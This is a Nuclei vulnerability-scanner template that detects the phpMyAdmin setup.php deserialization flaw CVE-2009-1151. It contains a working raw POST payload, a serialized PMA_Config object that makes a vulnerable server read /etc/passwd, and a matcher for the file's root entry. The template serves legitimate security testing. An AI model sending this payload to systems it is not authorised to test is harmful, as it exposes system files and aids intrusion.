# Nuclei template: checks whether a phpMyAdmin instance exposes the
# CVE-2009-1151 setup.php deserialization flaw (PMASA-2009-3).
# Structure: `info` is scanner metadata, `requests` holds the single raw
# HTTP probe and the matchers that decide whether the target is affected.
id: CVE-2009-1151

info:
  name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
  author: princechaddha
  severity: high
  description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
  # Vendor advisory first; the svn link points at the upstream fix diff and
  # vulhub at a reproducible lab environment. See the advisory for the
  # affected and fixed versions.
  reference:
    - https://www.phpmyadmin.net/security/PMASA-2009-3/
    - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
    - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
    - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
  classification:
    cve-id: CVE-2009-1151
  tags: cve,cve2009,phpmyadmin,rce,deserialization

requests:
  # One raw request; `{{Hostname}}` is filled in by the scanner at run time.
  # The body is a serialized PMA_Config object whose `source` names a local
  # file. On an unpatched setup.php the file is read as configuration and
  # its contents presumably surface in the response, which is what the
  # regex matcher below looks for. Keep the block scalar free of comments:
  # anything indented under `|` becomes part of the request.
  - raw:
      - |
        POST /scripts/setup.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

    # `and`: both matchers must hit before the target is reported.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # A passwd-style root entry in the body is the evidence that the
      # server read the file named in the payload; a 200 alone is not.
      - type: regex
        regex:
          - "root:.*:0:0:"